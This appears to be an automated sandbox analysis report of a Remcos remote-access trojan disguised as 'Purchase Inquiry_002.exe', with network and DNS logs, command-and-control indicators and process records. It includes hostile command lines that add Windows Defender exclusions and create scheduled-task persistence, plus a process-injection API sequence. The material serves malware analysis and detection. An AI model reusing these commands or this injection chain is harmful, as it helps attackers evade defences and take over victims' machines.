                              Nov 21, 2024 12:22:05.799211025 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:22:05.919533968 CET8049757178.237.33.50192.168.2.10
                              Nov 21, 2024 12:22:07.045173883 CET8049757178.237.33.50192.168.2.10
                              Nov 21, 2024 12:22:07.045320988 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:22:07.057647943 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:07.179143906 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:08.049088001 CET8049757178.237.33.50192.168.2.10
                              Nov 21, 2024 12:22:08.049151897 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:22:35.152904034 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:22:35.157516956 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:22:35.277152061 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:23:05.621078014 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:23:05.622374058 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:23:05.741914034 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:23:36.090356112 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:23:36.092118025 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:23:36.211793900 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:23:55.437576056 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:23:55.861006975 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:23:56.562330961 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:23:57.860974073 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:24:00.547007084 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:24:05.656444073 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:24:06.566520929 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:24:06.567789078 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:24:06.688178062 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:24:15.761326075 CET4975780192.168.2.10178.237.33.50
                              Nov 21, 2024 12:24:37.028301001 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:24:37.029489040 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:24:37.149267912 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:25:07.497009039 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:25:07.498631001 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:25:07.619234085 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:25:37.950030088 CET253149749154.216.19.141192.168.2.10
                              Nov 21, 2024 12:25:37.951174021 CET497492531192.168.2.10154.216.19.141
                              Nov 21, 2024 12:25:38.070732117 CET253149749154.216.19.141192.168.2.10

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 21, 2024 12:21:48.173746109 CET6046753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:49.197150946 CET6046753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:50.197642088 CET6046753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:52.236526012 CET6046753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:52.353193998 CET53604671.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:52.353215933 CET53604671.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:52.353229046 CET53604671.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:52.464458942 CET53604671.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:55.390942097 CET5755753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:56.390590906 CET5755753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:57.406150103 CET5755753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:59.406851053 CET5755753192.168.2.101.1.1.1
                              Nov 21, 2024 12:21:59.580117941 CET53575571.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:59.580132961 CET53575571.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:59.580142975 CET53575571.1.1.1192.168.2.10
                              Nov 21, 2024 12:21:59.633011103 CET53575571.1.1.1192.168.2.10
                              Nov 21, 2024 12:22:00.594325066 CET5303553192.168.2.101.1.1.1
                              Nov 21, 2024 12:22:01.593626976 CET5303553192.168.2.101.1.1.1
                              Nov 21, 2024 12:22:02.189199924 CET53530351.1.1.1192.168.2.10
                              Nov 21, 2024 12:22:02.189265966 CET53530351.1.1.1192.168.2.10
                              Nov 21, 2024 12:22:05.437208891 CET5183753192.168.2.101.1.1.1
                              Nov 21, 2024 12:22:05.674540043 CET53518371.1.1.1192.168.2.10
                              Nov 21, 2024 12:22:19.328787088 CET5089753192.168.2.101.1.1.1
                              Nov 21, 2024 12:22:19.555680990 CET53508971.1.1.1192.168.2.10

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 21, 2024 12:21:48.173746109 CET192.168.2.101.1.1.10x6c79Standard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:49.197150946 CET192.168.2.101.1.1.10x6c79Standard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:50.197642088 CET192.168.2.101.1.1.10x6c79Standard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:52.236526012 CET192.168.2.101.1.1.10x6c79Standard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:55.390942097 CET192.168.2.101.1.1.10xf6faStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:56.390590906 CET192.168.2.101.1.1.10xf6faStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:57.406150103 CET192.168.2.101.1.1.10xf6faStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:59.406851053 CET192.168.2.101.1.1.10xf6faStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:00.594325066 CET192.168.2.101.1.1.10xc6deStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:01.593626976 CET192.168.2.101.1.1.10xc6deStandard query (0)cee.work.gdA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:05.437208891 CET192.168.2.101.1.1.10xf662Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:19.328787088 CET192.168.2.101.1.1.10x8fdStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 21, 2024 12:21:52.353193998 CET1.1.1.1192.168.2.100x6c79Server failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:52.353215933 CET1.1.1.1192.168.2.100x6c79Server failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:52.353229046 CET1.1.1.1192.168.2.100x6c79Server failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:52.464458942 CET1.1.1.1192.168.2.100x6c79Server failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:59.580117941 CET1.1.1.1192.168.2.100xf6faServer failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:59.580132961 CET1.1.1.1192.168.2.100xf6faServer failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:59.580142975 CET1.1.1.1192.168.2.100xf6faServer failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:21:59.633011103 CET1.1.1.1192.168.2.100xf6faServer failure (2)cee.work.gdnonenoneA (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:02.189199924 CET1.1.1.1192.168.2.100xc6deNo error (0)cee.work.gd154.216.19.141A (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:02.189265966 CET1.1.1.1192.168.2.100xc6deNo error (0)cee.work.gd154.216.19.141A (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:05.674540043 CET1.1.1.1192.168.2.100xf662No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                              Nov 21, 2024 12:22:19.555680990 CET1.1.1.1192.168.2.100x8fdNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • geoplugin.net

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.1049757178.237.33.50808184C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              TimestampBytes transferredDirectionData
                              Nov 21, 2024 12:22:05.799211025 CET71OUTGET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              Nov 21, 2024 12:22:07.045173883 CET1170INHTTP/1.1 200 OK
                              date: Thu, 21 Nov 2024 11:22:06 GMT
                              server: Apache
                              content-length: 962
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                              Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:06:21:43
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0x360000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:3
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0x6e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
                              Imagebase:0x6e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp"
                              Imagebase:0xdf0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:06:21:46
                              Start date:21/11/2024
                              Path:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Purchase Inquiry_002.exe"
                              Imagebase:0xd70000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:10
                              Start time:06:21:47
                              Start date:21/11/2024
                              Path:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Imagebase:0x9d0000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 74%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:11
                              Start time:06:21:49
                              Start date:21/11/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff6616b0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:06:21:50
                              Start date:21/11/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xASiLfzXONGIW" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                              Imagebase:0xdf0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:13
                              Start time:06:21:50
                              Start date:21/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:14
                              Start time:06:21:51
                              Start date:21/11/2024
                              Path:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe"
                              Imagebase:0xcc0000
                              File size:914'432 bytes
                              MD5 hash:C016B06A4942455DF9CE8A58B72BCC90
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:198
                                Total number of Limit Nodes:6
                                execution_graph 27685 281d000 27686 281d046 GetCurrentProcess 27685->27686 27688 281d091 27686->27688 27689 281d098 GetCurrentThread 27686->27689 27688->27689 27690 281d0d5 GetCurrentProcess 27689->27690 27691 281d0ce 27689->27691 27692 281d10b 27690->27692 27691->27690 27693 281d133 GetCurrentThreadId 27692->27693 27694 281d164 27693->27694 27695 6d95318 27696 6d954a3 27695->27696 27697 6d9533e 27695->27697 27697->27696 27700 6d95598 PostMessageW 27697->27700 27702 6d95590 27697->27702 27701 6d95604 27700->27701 27701->27697 27703 6d95598 PostMessageW 27702->27703 27704 6d95604 27703->27704 27704->27697 27902 281d650 DuplicateHandle 27903 281d6e6 27902->27903 27925 281ac70 27926 281ac7f 27925->27926 27929 281ad58 27925->27929 27934 281ad68 27925->27934 27930 281ad79 27929->27930 27931 281ad9c 27929->27931 27930->27931 27932 281afa0 GetModuleHandleW 27930->27932 27931->27926 27933 281afcd 27932->27933 27933->27926 27935 281ad9c 27934->27935 27936 281ad79 27934->27936 27935->27926 27936->27935 27937 281afa0 GetModuleHandleW 27936->27937 27938 281afcd 27937->27938 27938->27926 27705 6d9181a 27706 6d91814 27705->27706 27707 6d91804 27705->27707 27711 6d9418e 27707->27711 27732 6d94130 27707->27732 27752 6d94121 27707->27752 27712 6d9411c 27711->27712 27713 6d94191 27711->27713 27730 6d9416e 27712->27730 27772 6d946f9 27712->27772 27777 6d94584 27712->27777 27782 6d945ee 27712->27782 27786 6d9452f 27712->27786 27790 6d94a4c 27712->27790 27795 6d9480d 27712->27795 27800 6d9462d 27712->27800 27805 6d945a8 27712->27805 27810 6d94c48 27712->27810 27815 6d94ad7 27712->27815 27820 6d948f2 27712->27820 27825 6d94b10 27712->27825 27830 6d946d1 27712->27830 27835 6d94891 27712->27835 27840 6d9479c 27712->27840 27844 6d947da 27712->27844 27849 6d945bb 27712->27849 27730->27706 27733 6d9414a 27732->27733 27734 6d9416e 27733->27734 27735 6d946f9 2 API calls 27733->27735 27736 6d945bb 2 API calls 27733->27736 27737 6d947da 2 API calls 27733->27737 27738 6d9479c 2 API calls 27733->27738 27739 6d94891 2 API calls 27733->27739 27740 6d946d1 2 API calls 27733->27740 27741 6d94b10 2 API calls 27733->27741 27742 6d948f2 2 API calls 27733->27742 27743 6d94ad7 2 API calls 27733->27743 27744 6d94c48 2 API calls 27733->27744 27745 6d945a8 2 API calls 27733->27745 27746 6d9462d 2 API calls 27733->27746 27747 6d9480d 2 API calls 27733->27747 27748 6d94a4c 2 API calls 27733->27748 27749 6d9452f 2 API calls 27733->27749 27750 6d945ee 2 API calls 27733->27750 27751 6d94584 2 API calls 27733->27751 27734->27706 27735->27734 27736->27734 27737->27734 27738->27734 27739->27734 27740->27734 27741->27734 27742->27734 27743->27734 27744->27734 27745->27734 27746->27734 27747->27734 27748->27734 27749->27734 27750->27734 27751->27734 27753 6d9414a 27752->27753 27754 6d9416e 27753->27754 27755 6d946f9 2 API calls 27753->27755 27756 6d945bb 2 API calls 27753->27756 27757 6d947da 2 API calls 27753->27757 27758 6d9479c 2 API calls 27753->27758 27759 6d94891 2 API calls 27753->27759 27760 6d946d1 2 API calls 27753->27760 27761 6d94b10 2 API calls 27753->27761 27762 6d948f2 2 API calls 27753->27762 27763 6d94ad7 2 API calls 27753->27763 27764 6d94c48 2 API calls 27753->27764 27765 6d945a8 2 API calls 27753->27765 27766 6d9462d 2 API calls 27753->27766 27767 6d9480d 2 API calls 27753->27767 27768 6d94a4c 2 API calls 27753->27768 27769 6d9452f 2 API calls 27753->27769 27770 6d945ee 2 API calls 27753->27770 27771 6d94584 2 API calls 27753->27771 27754->27706 27755->27754 27756->27754 27757->27754 27758->27754 27759->27754 27760->27754 27761->27754 27762->27754 27763->27754 27764->27754 27765->27754 27766->27754 27767->27754 27768->27754 27769->27754 27770->27754 27771->27754 27773 6d94590 27772->27773 27773->27772 27854 6d91040 27773->27854 27858 6d91048 27773->27858 27774 6d94772 27774->27730 27778 6d94590 27777->27778 27780 6d91048 WriteProcessMemory 27778->27780 27781 6d91040 WriteProcessMemory 27778->27781 27779 6d94772 27779->27730 27780->27779 27781->27779 27862 6d90ea8 27782->27862 27866 6d90eb0 27782->27866 27783 6d9460d 27870 6d912d0 27786->27870 27874 6d912c5 27786->27874 27791 6d94909 27790->27791 27792 6d94b8a 27791->27792 27878 6d90f88 27791->27878 27882 6d90f80 27791->27882 27792->27730 27796 6d94590 27795->27796 27798 6d91048 WriteProcessMemory 27796->27798 27799 6d91040 WriteProcessMemory 27796->27799 27797 6d94772 27797->27730 27798->27797 27799->27797 27801 6d9463d 27800->27801 27803 6d91048 WriteProcessMemory 27801->27803 27804 6d91040 WriteProcessMemory 27801->27804 27802 6d94cbe 27803->27802 27804->27802 27806 6d945b5 27805->27806 27886 6d90df9 27806->27886 27890 6d90e00 27806->27890 27807 6d94a17 27807->27730 27811 6d94c4c 27810->27811 27813 6d91048 WriteProcessMemory 27811->27813 27814 6d91040 WriteProcessMemory 27811->27814 27812 6d94772 27812->27730 27813->27812 27814->27812 27816 6d94e10 27815->27816 27818 6d90ea8 Wow64SetThreadContext 27816->27818 27819 6d90eb0 Wow64SetThreadContext 27816->27819 27817 6d94e2b 27818->27817 27819->27817 27821 6d948f8 27820->27821 27823 6d90f88 VirtualAllocEx 27821->27823 27824 6d90f80 VirtualAllocEx 27821->27824 27822 6d94dbb 27822->27730 27823->27822 27824->27822 27826 6d94b25 27825->27826 27828 6d91048 WriteProcessMemory 27826->27828 27829 6d91040 WriteProcessMemory 27826->27829 27827 6d94b5e 27828->27827 27829->27827 27831 6d946db 27830->27831 27833 6d90df9 ResumeThread 27831->27833 27834 6d90e00 ResumeThread 27831->27834 27832 6d94a17 27832->27730 27833->27832 27834->27832 27836 6d9489e 27835->27836 27838 6d91048 WriteProcessMemory 27836->27838 27839 6d91040 WriteProcessMemory 27836->27839 27837 6d94b5e 27838->27837 27839->27837 27894 6d91138 27840->27894 27898 6d91131 27840->27898 27841 6d947be 27841->27730 27845 6d94590 27844->27845 27847 6d91048 WriteProcessMemory 27845->27847 27848 6d91040 WriteProcessMemory 27845->27848 27846 6d94772 27846->27730 27847->27846 27848->27846 27850 6d945c8 27849->27850 27852 6d90df9 ResumeThread 27850->27852 27853 6d90e00 ResumeThread 27850->27853 27851 6d94a17 27851->27730 27852->27851 27853->27851 27855 6d91046 WriteProcessMemory 27854->27855 27857 6d910e7 27855->27857 27857->27774 27859 6d91090 WriteProcessMemory 27858->27859 27861 6d910e7 27859->27861 27861->27774 27863 6d90eb0 Wow64SetThreadContext 27862->27863 27865 6d90f3d 27863->27865 27865->27783 27867 6d90ef5 Wow64SetThreadContext 27866->27867 27869 6d90f3d 27867->27869 27869->27783 27871 6d91359 CreateProcessA 27870->27871 27873 6d9151b 27871->27873 27873->27873 27875 6d912d0 CreateProcessA 27874->27875 27877 6d9151b 27875->27877 27877->27877 27879 6d90fc8 VirtualAllocEx 27878->27879 27881 6d91005 27879->27881 27881->27792 27883 6d90f88 VirtualAllocEx 27882->27883 27885 6d91005 27883->27885 27885->27792 27887 6d90e00 ResumeThread 27886->27887 27889 6d90e71 27887->27889 27889->27807 27891 6d90e40 ResumeThread 27890->27891 27893 6d90e71 27891->27893 27893->27807 27895 6d91183 ReadProcessMemory 27894->27895 27897 6d911c7 27895->27897 27897->27841 27899 6d91138 ReadProcessMemory 27898->27899 27901 6d911c7 27899->27901 27901->27841 27904 2814668 27905 281467a 27904->27905 27906 2814686 27905->27906 27908 2814779 27905->27908 27909 281479d 27908->27909 27913 2814879 27909->27913 27917 2814888 27909->27917 27915 28148af 27913->27915 27914 281498c 27914->27914 27915->27914 27921 28144b4 27915->27921 27919 28148af 27917->27919 27918 281498c 27918->27918 27919->27918 27920 28144b4 CreateActCtxA 27919->27920 27920->27918 27922 2815918 CreateActCtxA 27921->27922 27924 28159db 27922->27924

                                Executed Functions

                                Function 06D834B8 Relevance: 3.1, Strings: 2, Instructions: 562COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
